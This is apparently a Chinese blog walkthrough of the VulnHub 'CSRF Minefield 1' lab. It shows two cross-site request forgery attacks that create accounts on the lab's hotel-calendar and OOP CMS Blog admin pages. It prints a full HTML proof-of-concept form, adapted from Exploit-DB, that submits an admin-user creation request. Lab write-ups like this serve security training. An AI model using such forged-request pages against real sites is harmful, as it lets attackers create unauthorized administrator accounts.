CSRF Minefield 1靶场***

北慕城南 提交于 2020-01-04 01:01:00

靶场下载链接 https://www.vulnhub.com/entry/csrf-minefield-1,316/

两处漏洞

第一处:访问http://192.168.110.208/hotelcal/admin/add_account.php原始密码 admin . admin
1.首先访问网站点击创建一个新用户
在这里插入图片描述

2.创建完账户之后使用bp拦截抓去数据包
在这里插入图片描述

3.发现没有使用Cookie token,将其数据包发送给burpsuite插件CSRF POC(burpsuite里可下载)可自行改密码账号,如下:
在这里插入图片描述

4.将生产的POC保存为csrfpoc.htm 或者直接复制地址进行访问,就成功创建用户
在这里插入图片描述

第二处:
访问http://192.168.110.208/oop/admin/addUser.php 原始密码admin . 123

首先我是在https://www.exploit-db.com/里面搜的OOP CMS Blog 1.0发现有一个是创建管理员,现在进行实现:
1.我先把上面的poc给下载下来 之后把他的ip、路径改成我自己的,最后生成一个html文件。

# POC: 
# 2)
# http://192.168.110.208/oop/admin/addUser.php
# 
<html>
<body>
<form action="http://192.168.110.208/oop/admin/addUser.php" method="post" enctype="multipart/form-data">
<table class="form">                    
<tbody><tr>
<td>
<label>User Name</label>
</td>
<td>
<input name="userName" placeholder="Enter User Name..." type="text">
</td>
</tr>
<tr>
<td>
<label>Full Name</label>
</td>
<td>
<input name="name" placeholder="Enter User Full Name..." type="text">
</td>
</tr>
<tr>
<td>
<label>User Password</label>
</td>
<td>
<input name="password" placeholder="Enter User Password..." type="text">
</td>
</tr>
<tr>
<td>
<label>Email</label>
</td>
<td>
<input name="email" placeholder="Enter User Email..." type="text">
</td>
</tr>
<tr>
<td>
<label>Details</label>
</td>
<td> 
<textarea name="details"></textarea>
</td>
</tr>
<tr>
<td>
<label>User Roll</label>
</td>
<td>
<select id="select" name="role">
<option>Select User Role</option>
<option value="0">Admin</option>
<option value="1">Author</option>
<option value="2">Editor</option>
</select>
</td>
</tr>
<tr>
<td></td> 
<td>
<input name="submit" value="Create" type="submit">
</td>
</tr>
</tbody>
</table>
</form>
</body>
</html>

2.点击生成的文件,如图:
在这里插入图片描述
3.进行输入用户,密码、选择管理员之后点击提交,他会自动跳转到创建用户的页面,发现他提示创建成功
在这里插入图片描述

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!